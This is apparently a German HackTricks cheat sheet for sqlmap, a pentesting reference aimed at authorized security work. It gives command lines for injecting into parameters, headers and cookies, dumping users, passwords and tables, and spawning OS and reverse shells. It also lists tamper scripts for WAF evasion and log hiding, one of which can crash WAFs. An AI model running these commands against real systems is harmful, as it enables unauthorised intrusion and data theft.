SQLMap

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Grundlegende Argumente für SQLmap

Allgemein

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY

Technik-Flags (--technique)

Der Parameter --technique definiert, welche SQL injection-Methoden sqlmap versuchen wird. Jeder Charakter in der Zeichenkette steht für eine Technik:

BuchstabeTechnikBeschreibung
BBoolean-based blindVerwendet True/False-Bedingungen, um Daten abzuleiten
EError-basedNutzt ausführliche DBMS-Fehlermeldungen, um Ergebnisse zu exfiltrieren
UUNION queryFügt UNION SELECT-Anweisungen ein, um Daten über denselben Kanal abzurufen
SStacked queriesFügt zusätzliche Anweisungen hinzu, getrennt durch ;
TTime-based blindVerläßt sich auf Verzögerungen (SLEEP, WAITFOR), um Injektionen zu erkennen
QInline / out-of-bandVerwendet Funktionen wie LOAD_FILE() oder OOB-Kanäle wie DNS

Die Standardreihenfolge ist BEUSTQ. Sie können sie neu anordnen oder einschränken, z. B. nur Boolean und Time-based in dieser Reihenfolge:

sqlmap -u "http://target/?id=1" --technique="BT" --batch

Informationen abrufen

Intern

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB

DB-Daten

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection-Stelle

Aus Burp/ZAP-Aufnahme

Fange die request ab und erstelle eine req.txt-Datei

sqlmap -r req.txt --current-user

GET Request Injection

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injections in Headers und andere HTTP Methods

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Second order injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Crawl eine Website mit SQLmap und auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Injection anpassen

Suffix setzen

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Präfix

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Hilfe bei der Suche nach boolean injection

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
TamperBeschreibung
apostrophemask.pyErsetzt das Apostroph-Zeichen durch sein UTF-8 Full-Width Gegenstück
apostrophenullencode.pyErsetzt das Apostroph-Zeichen durch sein illegal-doppeltes Unicode-Gegenstück
appendnullbyte.pyFügt am Ende des Payloads ein kodiertes NULL-Byte-Zeichen an
base64encode.pyBase64-kodiert alle Zeichen in einem gegebenen Payload
between.pyErsetzt den Größer-als-Operator (‘>’) durch ‘NOT BETWEEN 0 AND #’
bluecoat.pyErsetzt das Leerzeichen nach einer SQL-Anweisung durch ein gültiges zufälliges Blank-Zeichen. Anschließend wird das Zeichen = durch den LIKE-Operator ersetzt
chardoubleencode.pyURL-enkodiert alle Zeichen in einem gegebenen Payload doppelt (verarbeitet nicht bereits enkodierte)
commalesslimit.pyErsetzt Instanzen wie ‘LIMIT M, N’ durch ‘LIMIT N OFFSET M’
commalessmid.pyErsetzt Instanzen wie ‘MID(A, B, C)’ durch ‘MID(A FROM B FOR C)’
concat2concatws.pyErsetzt Instanzen wie ‘CONCAT(A, B)’ durch ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’
charencode.pyURL-enkodiert alle Zeichen in einem gegebenen Payload (verarbeitet nicht bereits enkodierte)
charunicodeencode.pyUnicode-URL-enkodiert nicht-enkodierte Zeichen in einem gegebenen Payload (verarbeitet nicht bereits enkodierte). “%u0022”
charunicodeescape.pyUnicode-URL-enkodiert nicht-enkodierte Zeichen in einem gegebenen Payload (verarbeitet nicht bereits enkodierte). “\u0022”
equaltolike.pyErsetzt alle Vorkommen des Gleichheitsoperators (‘=’) durch den Operator ‘LIKE’
escapequotes.pyMaskiert Quotes mit einem Slash (’ und “)
greatest.pyErsetzt den Größer-als-Operator (‘>’) durch das Pendant ‘GREATEST’
halfversionedmorekeywords.pyFügt vor jedem Keyword einen versionierten MySQL-Kommentar ein
ifnull2ifisnull.pyErsetzt Instanzen wie ‘IFNULL(A, B)’ durch ‘IF(ISNULL(A), B, A)’
modsecurityversioned.pyUmschließt die komplette Abfrage mit einem versionierten Kommentar
modsecurityzeroversioned.pyUmschließt die komplette Abfrage mit einem null-versionierten Kommentar
multiplespaces.pyFügt um SQL-Keywords mehrere Leerzeichen hinzu
nonrecursivereplacement.pyErsetzt vordefinierte SQL-Keywords durch Darstellungen, die für Replacement-Filter geeignet sind (z.B. .replace(“SELECT”, “”))
percentage.pyFügt vor jedes Zeichen ein Prozentzeichen (‘%’)
overlongutf8.pyKonvertiert alle Zeichen in einem gegebenen Payload (verarbeitet nicht bereits enkodierte)
randomcase.pyErsetzt jeden Zeichen eines Keywords durch eine zufällige Groß-/Kleinschreibung
randomcomments.pyFügt SQL-Keywords zufällige Kommentare hinzu
securesphere.pyHängt einen speziell konstruierten String an
sp_password.pyHängt ‘sp_password’ an das Ende des Payloads zur automatischen Obfuskation in DBMS-Logs an
space2comment.pyErsetzt das Leerzeichen (’ ’) durch Kommentare
space2dash.pyErsetzt das Leerzeichen (’ ‘) durch einen Dash-Kommentar (’–‘) gefolgt von einem zufälligen String und einem Newline (’\n’)
space2hash.pyErsetzt das Leerzeichen (’ ‘) durch ein Pfund-Zeichen (’#‘) gefolgt von einem zufälligen String und einem Newline (’\n’)
space2morehash.pyErsetzt das Leerzeichen (’ ‘) durch ein Pfund-Zeichen (’#‘) gefolgt von einem zufälligen String und einem Newline (’\n’)
space2mssqlblank.pyErsetzt das Leerzeichen (’ ’) durch ein zufälliges Blank-Zeichen aus einer gültigen Menge alternativer Zeichen
space2mssqlhash.pyErsetzt das Leerzeichen (’ ‘) durch ein Pfund-Zeichen (’#‘) gefolgt von einem Newline (’\n’)
space2mysqlblank.pyErsetzt das Leerzeichen (’ ’) durch ein zufälliges Blank-Zeichen aus einer gültigen Menge alternativer Zeichen
space2mysqldash.pyErsetzt das Leerzeichen (’ ‘) durch einen Dash-Kommentar (’–‘) gefolgt von einem Newline (’\n’)
space2plus.pyErsetzt das Leerzeichen (’ ‘) durch ein Plus (’+’)
space2randomblank.pyErsetzt das Leerzeichen (’ ’) durch ein zufälliges Blank-Zeichen aus einer gültigen Menge alternativer Zeichen
symboliclogical.pyErsetzt die logischen Operatoren AND und OR durch ihre symbolischen Gegenstücke (&& and ||)
unionalltounion.pyErsetzt UNION ALL SELECT durch UNION SELECT
unmagicquotes.pyErsetzt das Quote-Zeichen (’) durch ein Multi-Byte-Kombo %bf%27 zusammen mit einem generischen Kommentar am Ende (um es funktionsfähig zu machen)
uppercase.pyErsetzt jeden Zeichen eines Keywords durch Großschreibung ‘INSERT’
varnish.pyHängt einen HTTP-Header ‘X-originating-IP’ an
versionedkeywords.pyUmschließt jedes Nicht-Funktions-Keyword mit einem versionierten MySQL-Kommentar
versionedmorekeywords.pyUmschließt jedes Keyword mit einem versionierten MySQL-Kommentar
xforwardedfor.pyHängt einen gefälschten HTTP-Header ‘X-Forwarded-For’ an
luanginxmore.pyPOST-only tamper, der Millionen Dummy-Parameter voranstellt, um Lua‑Nginx WAF-Parser zu überlasten (z.B. Cloudflare).

luanginxmore generiert ~4.2M zufällige POST-Parameter vor deinem Payload; verwende es nur mit --method=POST und erwarte große Request-Größen, die schlecht konfigurierte Lua-Nginx WAFs zum Absturz bringen können.

Neuere Schalter, die sich zu aktivieren lohnen (>=1.9.x)

  • HTTP/2 transport: --http2 zwingt sqlmap dazu, HTTP/2 zu verwenden (hilfreich gegen Front-Ends, die HTTP/1.1 drosseln, aber h2 lockern). Kombiniere mit --force-ssl, um HTTPS zu erzwingen.
  • Proxy rotation: --proxy-file proxies.txt --proxy-freq 3 rotiert durch eine Liste und wechselt alle 3 Requests den Proxy, um IP-basierte Drosselung zu vermeiden.
  • Offline / purge modes: --offline verwendet gecachte Session-Daten erneut, ohne das Ziel zu berühren (kein Netzwerkverkehr), während --purge das Session-/Output-Verzeichnis sicher löscht, wenn du fertig bist.
  • Mobile UA emulation: --mobile fordert dich auf, einen gängigen Smartphone User-Agent zu spoof’en, nützlich bei APIs, die mobilen Clients zusätzliche Felder ausliefern.

References

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks